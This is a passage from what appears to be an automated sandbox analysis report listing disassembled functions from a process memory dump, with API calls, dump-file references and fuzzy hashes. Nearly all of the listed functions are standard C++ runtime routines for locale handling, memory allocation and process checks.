                                                                      • __EH_prolog3.LIBCMT ref: 0040395D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403967
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • messages.LIBCPMT ref: 004039A1
                                                                      • std::_Facet_Register.LIBCPMT ref: 004039B8
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004039D8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                      • String ID: hJD
                                                                      • API String ID: 2750803064-3265421708
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403B1C
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403B26
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 00403B60
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403B77
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403B97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID: xJD
                                                                      • API String ID: 419941038-3733242620
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403BB1
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403BBB
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • moneypunct.LIBCPMT ref: 00403BF5
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403C0C
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403C2C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                      • String ID: tJD
                                                                      • API String ID: 419941038-3617471384
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,40000022,755CD0F6,?,00000000,?,?,?,?,00429DA0,000000FF,?,003E6432,00000000,?), ref: 003E6CC4
                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,755CD0F6,?,00000000,?,?,?,?,00429DA0,000000FF,?,003E6432,00000000,?), ref: 003E6CE7
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00429DA0,000000FF,?,003E6432,00000000), ref: 003E6D87
                                                                      • LocalFree.KERNEL32(?,755CD0F6,00000000,004293B0,000000FF,?,00000000,00000000,00429DA0,000000FF,755CD0F6), ref: 003E6E0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID: 2d>$2d>
                                                                      • API String ID: 2012307162-3886783025
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EB5ED
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      • LocalFree.KERNEL32 ref: 003EB6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                      • String ID:
                                                                      • API String ID: 1378673503-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3509577899-3206640213
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,0040AEEC,00409710,004085A3), ref: 0040AF03
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040AF11
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040AF2A
                                                                      • SetLastError.KERNEL32(00000000,0040AEEC,00409710,004085A3), ref: 0040AF7C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: d27d2d4a4a8db9bf093b34df8ef4a0272090e01967c5dfaab12f08fa9691f651
                                                                      • Instruction ID: ea3fb0c165e55a81ce424da4900f0c37453ab16568a5a12c944ccd3a546bb3c1
                                                                      • Opcode Fuzzy Hash: d27d2d4a4a8db9bf093b34df8ef4a0272090e01967c5dfaab12f08fa9691f651
                                                                      • Instruction Fuzzy Hash: AE01287260D3229EE6242BB67CC6A1B6645DB12B79720033FF110761F2EF7D4D21614D
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F45AE
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                        • Part of subcall function 003EC0B0: __Getctype.LIBCPMT ref: 003EC112
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$AllocGetctypeH_prolog3LocalLockit::_Lockit::~_
                                                                      • String ID: lHD$pHD$tHD$xHD
                                                                      • API String ID: 3791111190-587920680
                                                                      • Opcode ID: 232605f0878a81df308de179195815261465bac67ab5163ae764cdf9618f72ce
                                                                      • Instruction ID: 55c34f9a92dfcdd21f9d2552281f0f5ff1b38f276f00e17b39b64589a73d277e
                                                                      • Opcode Fuzzy Hash: 232605f0878a81df308de179195815261465bac67ab5163ae764cdf9618f72ce
                                                                      • Instruction Fuzzy Hash: CC51B7B190021EABEB137F668C42A7F7A6CEF42354F15452AFA15AE181EF748D0086E5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2204710431-1686923651
                                                                      • Opcode ID: 0183176cb70b9adb3c7c24fa0ee114fcbb9788bc898a5472e26d3d91c9f9c142
                                                                      • Instruction ID: d60a9f95c9368112be44310d0ea99e305187f41728581cfa5405d429164bb2da
                                                                      • Opcode Fuzzy Hash: 0183176cb70b9adb3c7c24fa0ee114fcbb9788bc898a5472e26d3d91c9f9c142
                                                                      • Instruction Fuzzy Hash: 8021B2B1904B966FD726DF75849473BBFF8AB0D300B04491EE599CBA42E734E601CB90
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(755CD0F6,755CD0F6,?,?,00000000,0042A221,000000FF), ref: 003E847B
                                                                        • Part of subcall function 00407875: EnterCriticalSection.KERNEL32(00444AF8,00000000,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 00407880
                                                                        • Part of subcall function 00407875: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26,?,?,?,755CD0F6), ref: 004078BD
                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 003E8440
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003E8447
                                                                        • Part of subcall function 0040782B: EnterCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407835
                                                                        • Part of subcall function 0040782B: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407868
                                                                        • Part of subcall function 0040782B: RtlWakeAllConditionVariable.NTDLL ref: 004078DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                      • String ID: IsWow64Process$kernel32
                                                                      • API String ID: 2056477612-3789238822
                                                                      • Opcode ID: 930a0c3d0987b7bd1d773d4828dbb923da7f3ddf04d6a2714b43495823aa9aa2
                                                                      • Instruction ID: d8637fd8be78d55ada56985ef9a68356c3d0c379b5482ca84f0bc431d01c84af
                                                                      • Opcode Fuzzy Hash: 930a0c3d0987b7bd1d773d4828dbb923da7f3ddf04d6a2714b43495823aa9aa2
                                                                      • Instruction Fuzzy Hash: AD11D2B2D04B55EFCB20CFA5EC05B59B7A8F709724F10477AE815A33D0DB39A900CA98
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F2700
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F270A
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F275B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F277B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: lHD
                                                                      • API String ID: 2854358121-4154305490
                                                                      • Opcode ID: 4d19b201ac16dc9078ac224629bde84bbedd85010c378ac4fd4603d0503119fe
                                                                      • Instruction ID: d7bccca80e7ee6d2ee2f8331678ab6fa5dfd7fe70c603a629f431d40846c9a78
                                                                      • Opcode Fuzzy Hash: 4d19b201ac16dc9078ac224629bde84bbedd85010c378ac4fd4603d0503119fe
                                                                      • Instruction Fuzzy Hash: 9E01C47590061DDBCB02FBA5C8456BEB7A5AF94310F244519EA206B3D2CF349E059BC4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F2795
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F279F
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F27F0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F2810
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: pHD
                                                                      • API String ID: 2854358121-3802264006
                                                                      • Opcode ID: 51badf8817e0e8d893f3edc99cb7cb3b030f1df2f4cc732f19b9f325326def85
                                                                      • Instruction ID: 36a85e3135cd0907ebef9cd8e1baaf8f71753627d5bbbb30382a4aa5bf57291b
                                                                      • Opcode Fuzzy Hash: 51badf8817e0e8d893f3edc99cb7cb3b030f1df2f4cc732f19b9f325326def85
                                                                      • Instruction Fuzzy Hash: 0A01D23990062DDBCF06FBA4D8056BFB7A5AF95320F25051DE611AF2D2DF349E028B94
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 004039F2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004039FC
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403A4D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403A6D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: lJD
                                                                      • API String ID: 2854358121-3316369744
                                                                      • Opcode ID: a4175a6803f1e710eb6c27bbe58f2847dbf15ea4c37835ac1400cbc756a2be03
                                                                      • Instruction ID: 403b843a449813cda2db50056ccaa437625fe576d81646a008215a346943d16c
                                                                      • Opcode Fuzzy Hash: a4175a6803f1e710eb6c27bbe58f2847dbf15ea4c37835ac1400cbc756a2be03
                                                                      • Instruction Fuzzy Hash: ED01C475A006199FCF02EFA4C8456BEBB75AF94310F24412AE5107B3D2DF389F058B88
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403A87
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403A91
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403AE2
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403B02
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: pJD
                                                                      • API String ID: 2854358121-3499594564
                                                                      • Opcode ID: 302ffa449e3e6734c7128c19779e53a63a7e38fc52fd5960487bb0354633947f
                                                                      • Instruction ID: b8d671914e744da837f9a84db1167dd5445a4c61d9bbd16796a73dabaebde34e
                                                                      • Opcode Fuzzy Hash: 302ffa449e3e6734c7128c19779e53a63a7e38fc52fd5960487bb0354633947f
                                                                      • Instruction Fuzzy Hash: 3201C8359006199FCF12EFA4D8466BE7B75AF84310F24052AE5117B3D2DF789E018B88
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403C46
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403C50
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403CA1
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403CC1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: |JD
                                                                      • API String ID: 2854358121-3649923616
                                                                      • Opcode ID: f2a18ded649ba0eff170a70b3563694c956bcbad085f0a190747bcd927346821
                                                                      • Instruction ID: 0d4ebfafd99f01df37e713658a20bc63eb1acbe0cbaae429993ad3116168f4d9
                                                                      • Opcode Fuzzy Hash: f2a18ded649ba0eff170a70b3563694c956bcbad085f0a190747bcd927346821
                                                                      • Instruction Fuzzy Hash: 2B0108769005199BCB02EFA5C8056BEBB65AF84710F14442AE910BB3C1CF389E018BC8
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7E78
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7E82
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7ED3
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7EF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: ID
                                                                      • API String ID: 2854358121-3023824217
                                                                      • Opcode ID: 960007b23d11b8e07b99d5faf367cd037b1e076f456c3c7c6058f9917522e476
                                                                      • Instruction ID: d3bc7e779990e8152bc9c1804cd1e0f957ae14c67ecbb9761aa95c6089023a40
                                                                      • Opcode Fuzzy Hash: 960007b23d11b8e07b99d5faf367cd037b1e076f456c3c7c6058f9917522e476
                                                                      • Instruction Fuzzy Hash: 9A01D27590162D9BCF03EBA4D8467BEB7A1AF94310F24055AE610AF3D2DF349E028BD4
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7FA2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7FAC
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7FFD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F801D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: ID
                                                                      • API String ID: 2854358121-3023824217
                                                                      • Opcode ID: 690c5aa9bde1be25f6e0d7545b7907ac768035aa3f49d0d470542fff5bc0c626
                                                                      • Instruction ID: 7c32efd6fb47e1388c63cef68ef20d3bfe781d19796261263a18757880d54204
                                                                      • Opcode Fuzzy Hash: 690c5aa9bde1be25f6e0d7545b7907ac768035aa3f49d0d470542fff5bc0c626
                                                                      • Instruction Fuzzy Hash: B501D67590061DDBCF06EB64D8467BE77A1AF94320F25011EE610AF2D2DF349E019B85
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,755CD0F6,?,?,00000000,0042CBE4,000000FF,?,004183F1,?,?,004183C5,?), ref: 00418496
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004184A8
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,0042CBE4,000000FF,?,004183F1,?,?,004183C5,?), ref: 004184CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
